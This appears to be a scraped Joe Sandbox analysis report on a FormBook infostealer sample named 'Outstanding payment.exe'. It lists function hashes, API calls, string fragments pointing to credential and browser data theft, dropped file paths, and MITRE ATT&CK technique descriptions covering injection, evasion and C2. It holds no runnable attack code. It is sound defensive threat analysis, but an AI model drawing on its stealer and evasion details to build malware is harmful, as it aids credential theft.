Instruction ID: ab74ee67dc480b0cff2853f1fb40e5da838139c5e40d13486c05a853920ee0df
Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
Instruction Fuzzy Hash: 0A012570518A1D8FDBC4DF1CE088B15B7E0FB58314F1546AED85DCB266C670D881CB81

Function 118AA5B2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

socket.WS2_32 ref: 118AA611

Strings

sock, xrefs: 118AA5D9

Memory Dump Source

Source File: 0000000A.00000002.4544744783.0000000011860000.00000040.80000000.00040000.00000000.sdmp, Offset: 11860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_11860000_explorer.jbxd

Similarity

API ID: socket
String ID: sock
API String ID: 98920635-2415254727
Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
Instruction ID: 78751c772a3078d96896b1c1887ab771da2a16340774713945cc6007b8a50357
Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
Instruction Fuzzy Hash: 8E01447061861C8FC784DF1CE048B54BBE0FB59314F1585ADD45ECB266C7B4C981CB86

Function 118A22DD Relevance: 1.6, APIs: 1, Instructions: 91
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNEL32 ref: 118A232D

Memory Dump Source

Source File: 0000000A.00000002.4544744783.0000000011860000.00000040.80000000.00040000.00000000.sdmp, Offset: 11860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_11860000_explorer.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
Instruction ID: c73ed62ad739380f9c663a9e22ff1915140692a2d9ab95229b10d465cef5b2e2
Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
Instruction Fuzzy Hash: 15319C74604B5ADFDB64DF29A0883A5B7A2FB55304F44827EC91DCB116CB70A090CFD1

Function 118A2412 Relevance: 1.5, APIs: 1, Instructions: 46
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32 ref: 118A2461

Memory Dump Source

Source File: 0000000A.00000002.4544744783.0000000011860000.00000040.80000000.00040000.00000000.sdmp, Offset: 11860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_11860000_explorer.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
Instruction ID: ec3d09113b5f7558995d2e0c20e13402a0f22ada24509131c257f0ee824a5219
Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
Instruction Fuzzy Hash: E7F04634228E094FD788EF2CE48163AF3E0FBE8304F40463EA94DC3260CA38C5818716

Non-executed Functions

Function 0E850AB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON

Download Yara Rule

Strings

c, xrefs: 0E850C0B
D, xrefs: 0E850CDA
[, xrefs: 0E850C2D
], xrefs: 0E850CA8
[, xrefs: 0E850CCD
[, xrefs: 0E850C66
l, xrefs: 0E850CE2
e, xrefs: 0E850CA0
[, xrefs: 0E850BF6
b, xrefs: 0E850C73
l, xrefs: 0E850C35
], xrefs: 0E850C3D
[, xrefs: 0E850C90
n, xrefs: 0E850C98

Memory Dump Source

Source File: 0000000A.00000002.4543551042.000000000E7D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e7d0000_explorer.jbxd

Similarity

API ID:
String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
API String ID: 0-355182820
Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction ID: ad2fd47e54eddc02b5c4bc91263fdd8e7b775421c4ebd9ca450d07db388e4413
Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction Fuzzy Hash: D6C16C75218F089FC758EF28C4996EAF3E1FB94304F504B2E989AC7250DF70A915CB86

Function 0E84A2F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

cli., xrefs: 0E84A327
opera_browser.dll, xrefs: 0E84A629
nspr, xrefs: 0E84A4D4
sspi, xrefs: 0E84A320
dll, xrefs: 0E84A32E
l, xrefs: 0E84A4E2
dragon_s.dll, xrefs: 0E84A614
4.dl, xrefs: 0E84A4DB

Memory Dump Source

Source File: 0000000A.00000002.4543551042.000000000E7D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e7d0000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: ebbb4ebe291769dc5f96fad2c785505eab21786052a3ea02b5e6327c8f8e8424
Instruction ID: 86c792abe0f74fe8cdc3efb30085e52aa10f6bdfca8deb098679686b5b7b6864
Opcode Fuzzy Hash: ebbb4ebe291769dc5f96fad2c785505eab21786052a3ea02b5e6327c8f8e8424
Instruction Fuzzy Hash: BCC17071618E1D8FC758EF68D495AAAF3E1FB94300F814769984ED7254EF30EE018B86

Function 0E84BCD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON

Download Yara Rule

Strings

word, xrefs: 0E84BD9E
L: , xrefs: 0E84BD66
UR, xrefs: 0E84BD5F
Pass, xrefs: 0E84BD97
User, xrefs: 0E84BDAB
2, xrefs: 0E84BDE1
name, xrefs: 0E84BDB2

Memory Dump Source

Source File: 0000000A.00000002.4543551042.000000000E7D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e7d0000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 7d10a6a1127b92590187fa7c2de37b7b0843552597d3b90625533ae3c6c8ea04
Instruction ID: 028703f53e296ba519ad14c716ed0c07ad9dd71101902b17b718a9ff7dc0087a
Opcode Fuzzy Hash: 7d10a6a1127b92590187fa7c2de37b7b0843552597d3b90625533ae3c6c8ea04
Instruction Fuzzy Hash: 98A1907161874C8BDB19EFA8D4447EEB7E5FF84300F404A2DE48AD7291EF7099458786

Function 0E84BCE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON

Download Yara Rule

Strings

word, xrefs: 0E84BD9E
L: , xrefs: 0E84BD66
UR, xrefs: 0E84BD5F
Pass, xrefs: 0E84BD97
User, xrefs: 0E84BDAB
2, xrefs: 0E84BDE1
name, xrefs: 0E84BDB2

Memory Dump Source

Source File: 0000000A.00000002.4543551042.000000000E7D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e7d0000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 066fbb727de8fc1e446c130359459d5f20aab217c7d499fc8a15641f2eaed13b
Instruction ID: eefba21652f0004cece21fa2e6bbea3bad4f0571332af1c306f5d67b8a60dd2b
Opcode Fuzzy Hash: 066fbb727de8fc1e446c130359459d5f20aab217c7d499fc8a15641f2eaed13b
Instruction Fuzzy Hash: 3D91807161874C8BDB19EFA8D444BEEB7E1FF88300F40462DE48AD7291EF7099458786

Function 0E8494B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON

Download Yara Rule

Strings

user, xrefs: 0E8494D3
sspi, xrefs: 0E84950E
dll, xrefs: 0E84951C
32.d, xrefs: 0E8494DA
cli., xrefs: 0E849515

Memory Dump Source

Source File: 0000000A.00000002.4543551042.000000000E7D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e7d0000_explorer.jbxd

Similarity

API ID:
String ID: 32.d$cli.$dll$sspi$user
API String ID: 0-327345718
Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction ID: 2a7819743ffd6af493872ccad26455ae9a630147bb6607b2a2389ca52a3f6985
Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction Fuzzy Hash: B3417270A18E0D8FCF64EF9880957AE73E1FB98300F51456AE80ED7254DA71C9418B86

Function 0E84E0B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON

Download Yara Rule

Strings

Snif, xrefs: 0E84E154
, xrefs: 0E84E184
f fr, xrefs: 0E84E13D
om:, xrefs: 0E84E146

Memory Dump Source

Source File: 0000000A.00000002.4543551042.000000000E7D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e7d0000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction ID: 2de1f79d7b160282df098ee970c1232a963cacd3c526acdd7ac495a475ec2906
Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction Fuzzy Hash: B6319071518B886FD71AEB28C4846DAB7D4FB94300F904D1EE89BC7295EE30A949CB43

Function 0E84E0C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON

Download Yara Rule

Strings

Snif, xrefs: 0E84E154
, xrefs: 0E84E184
f fr, xrefs: 0E84E13D
om:, xrefs: 0E84E146

Memory Dump Source

Source File: 0000000A.00000002.4543551042.000000000E7D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e7d0000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction ID: 82e546f266a33b6d3925cd2c49ee02bbadb828141de43454d3a11294de632f5d
Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction Fuzzy Hash: 62318272518B486FD71AEB28C4846EAB7D5FB94300F504D1EE49BC7395EE30A946CA43

Function 0E84C8C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

nt: , xrefs: 0E84C91E
User-Agent: , xrefs: 0E84C935, 0E84C948
on.d, xrefs: 0E84C902
urlmon.dll, xrefs: 0E84C959

Memory Dump Source

Source File: 0000000A.00000002.4543551042.000000000E7D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e7d0000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: 4180a136a10a40576f6b721e2486d3c6612d8a975063e7f5485f0a6b50da4c1c
Instruction ID: 312c7c121f18187c37129c37b19b4b583c6c0c4bfe012934754cec62c6dc4104
Opcode Fuzzy Hash: 4180a136a10a40576f6b721e2486d3c6612d8a975063e7f5485f0a6b50da4c1c
Instruction Fuzzy Hash: 2231D171614B0C8BCB05EFA8C8847EDBBE4FB68204F40062AE84ED7350DF749A45C78A

Function 0E84C8BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

nt: , xrefs: 0E84C91E
User-Agent: , xrefs: 0E84C935, 0E84C948
on.d, xrefs: 0E84C902
urlmon.dll, xrefs: 0E84C959

Memory Dump Source

Source File: 0000000A.00000002.4543551042.000000000E7D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e7d0000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: 716dfafc271c68059d23c0ddd748daefbc0e9c88f80a9a95356da7d4682ef32b
Instruction ID: eeb96ee2903761ed5299202a4460ab6ae39cfa09ebc82ace10ceab63b4473e5b
Opcode Fuzzy Hash: 716dfafc271c68059d23c0ddd748daefbc0e9c88f80a9a95356da7d4682ef32b
Instruction Fuzzy Hash: 7421D571610B0C8BCB05EFA8C8847EDBBE4FF58204F40461AE85AD7354DF749A05C786

Function 0E84DE94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

t, xrefs: 0E84DEF4
., xrefs: 0E84DF1F
l, xrefs: 0E84DF26
l, xrefs: 0E84DF03

Memory Dump Source

Source File: 0000000A.00000002.4543551042.000000000E7D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e7d0000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction ID: 08cf337b52207c0a6c01dd54fd11798efa302226a0f1732ffbd03fb8a3a4e47e
Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction Fuzzy Hash: 73216B75A24A0D9BDB08EFA8D4447EDBBF1FB18304F504A2ED409D3700DB7999558B85

Function 0E84DE92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

t, xrefs: 0E84DEF4
., xrefs: 0E84DF1F
l, xrefs: 0E84DF26
l, xrefs: 0E84DF03

Memory Dump Source

Source File: 0000000A.00000002.4543551042.000000000E7D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e7d0000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction ID: a4223ec60b143abfccebb5ea58c84e4800218efc932e936fbf62975aee54de85
Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction Fuzzy Hash: 74217A74A24B0E9BDB08EFA8D4447AEBAF0FB18300F504A2ED409D3710DB7999918B85

Input	Output
URL: email Model: Joe Sandbox AI	{ "risk_score": 1, "reasoning": [ "No headers provided to analyze", "Cannot make security assessment without header information", "Default to low risk score due to lack of evidence" ] }
Date: unknown

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Outstanding payment.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: FormBook

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Outstanding payment.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\iBSWjb.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_03hkkdh3.ypg.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_34qw05zq.w2b.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_52eucve1.ftn.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_anq4t5ds.b1y.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jxxbcmwh.nng.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nhuexac3.cpk.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rodvztqb.mdz.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zrdf23vf.zzk.ps1

Windows Analysis Report
Outstanding payment.exe

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre